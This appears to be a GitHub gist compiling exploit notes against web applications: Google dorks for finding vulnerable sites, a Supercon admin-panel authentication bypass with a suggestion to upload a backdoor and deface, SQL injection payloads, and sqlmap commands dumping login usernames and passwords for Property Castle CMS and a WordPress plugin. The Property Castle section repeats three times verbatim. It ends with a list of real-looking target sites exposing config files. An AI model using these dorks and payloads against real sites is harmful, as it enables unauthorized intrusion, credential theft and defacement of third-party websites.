Created
November 5, 2015 16:21
-
-
Save dreadpiratesr/2dab641a16c2d9bad7c9 to your computer and use it in GitHub Desktop.
Revisions
-
dreadpiratesr created this gist
Nov 5, 2015 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,140 @@ Exploit Title: Supercon Direct login to admin panel without entering password Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices” Product Description ——————- Supercon delivers high quality, reliable and cost-effective IT services to customers globally. We provide world-class technology services by constantly exploring and implementing innovative solutions that drive long-term value to our customers. We have been providing solutions to clients across the globe for more than 5 years and boast of our extensive experience on website designing and development projects. Vulnerability Details ——————— First type the dork [inurl:/webadmin/login.php intext:“Supercon Infoservices”] Then after find the site in which their is written Copyright © [Version] Supercon Infoservices(P) Ltd. in the footer Now, go to it’s admin page http://www.targetsite.com/webadmin/login.php After opening the admin panel . Follow this link http://www.targetsite.com/webadmin/manage-gallery.php And voila you will be directly login into the admin panel and you can also upload your backdoor and deface :) . Exploit Title: Wordpress Better-wp-security Plugin Remote Code Execution Google Dork : inurl:wp-content/plugins/better-wp-security Location : http://site.com/wp-content/plugins/better-wp-security/better-wp-security.php Vulnerability is also triggered in: http://site.com/wp-content/plugins/better-wp-security/core/class-itsec-core.php public function admin_tooltip_ajax() { global $itsec_globals; if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( $_POST['nonce'] ), 'itsec_tooltip_nonce' ) ) { die (); } if ( sanitize_text_field( $_POST['module'] ) == 'close' ) { $data = $itsec_globals['data']; $data['tooltips_dismissed'] = true; update_site_option( 'itsec_data', $data ); } else { call_user_func_array( $this->tooltip_modules[ sanitize_text_field( $_POST['module'] ) ]['callback'], array() ); } die(); // this is required to return a proper result } Exploit Title: Property Castle CMS post SQL injection Google Dork: inurl:“/cms/cms.php?link_id=” 1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+ we will have database name 2- we search “contact us” page 3- we use “http header” to get data names (all post data are injectable , i will use the first in this example) 4- we use sqlmap tool now and inject it with POST method EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ] #admin page: http://website/admin/index.php Exploit Title: Property Castle CMS post SQL injection Google Dork: inurl:“/cms/cms.php?link_id=” 1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+ we will have database name 2- we search “contact us” page 3- we use “http header” to get data names (all post data are injectable , i will use the first in this example) 4- we use sqlmap tool now and inject it with POST method EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ] #admin page: http://website/admin/index.php Exploit Title: Property Castle CMS post SQL injection Google Dork: inurl:“/cms/cms.php?link_id=” 1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+ we will have database name 2- we search “contact us” page 3- we use “http header” to get data names (all post data are injectable , i will use the first in this example) 4- we use sqlmap tool now and inject it with POST method EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ] #admin page: http://website/admin/index.php Exploit Title : WordPress Gallery Objects 0.4 SQL Injection Dork Google: inurl:/admin-ajax.php?action=go_view_object ###################### Poc via Browser: http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html sqlmap: sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid --- Place: GET Parameter: viewid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html --- ##################### Polish CMS - SQL Injection {-} Vulnerable Versions => All Versions So Far. {x} Google Dork:: 1 => inurl:index.php?op=galeria id= site:pl {x} Google Dork:: 2 => inurl:new/index.php?op=galeria id= site:pl ——————————————————————————————————————————– File: index.php {HomePage} Vulnerable Parameters: [id] , [j] , [s] , [lang] Administration Panel: /admin/ Exploit Title: PRIVATE CSR Google Dork : inurl:/“config/config.izo” # Priv8 SCR Editors # ####################################################### # Use Editors To Edit Config Files And Deafce The Site Via CSR Editors. ####################################################### # # [+] Example: #http://lom-radioX.com/config/config.izo #http://kesbangpolbuXlukumba.info/config/config.izo #http://www.mirgosXtinits.ru/config/config.izo #http://sacredodysXsey.com/config/config.izo #http://www.biohXgienica.com/config/config.izo ####################################################### # [+] Deface Page: www.site.com/config/tar.tmp #######################################################